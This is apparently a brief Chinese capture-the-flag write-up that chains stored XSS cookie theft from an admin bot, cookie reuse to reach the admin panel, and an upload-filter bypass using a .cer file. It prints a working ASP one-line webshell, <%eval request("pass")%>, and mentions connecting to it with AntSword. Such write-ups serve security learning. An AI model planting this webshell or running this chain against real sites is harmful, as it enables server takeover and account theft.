0.题目来源
最近做了一道与Xss+Cookie 伪造 +上传木马+最后取得webshell的题目,来源是这里
1.Xss获取cookie
如图,首先我们在这个网站中发现有一个留言板,并且部分输入框拥有一个存储型Xss的漏洞,因此直接利用Xss平台,获取到会自动访问的管理员身份的机器人的cookie。
2.利用cookie获取管理员权限进入后台
如图输入刚刚获取的cookie成功进入后台
3.利用上传图片功能获取目标权限
后台管理中发现有一个位置能够上传图片,因此思考能否通过图片马取得目标,于是开始构建图片马,然后发现图片无法被执行,于是发现cer能够上传并被执行,因此创建了cer并输入<%eval request("pass")%>
作为一句话代码上传。
然后就可以利用蚁剑等工具连接上目标服务器。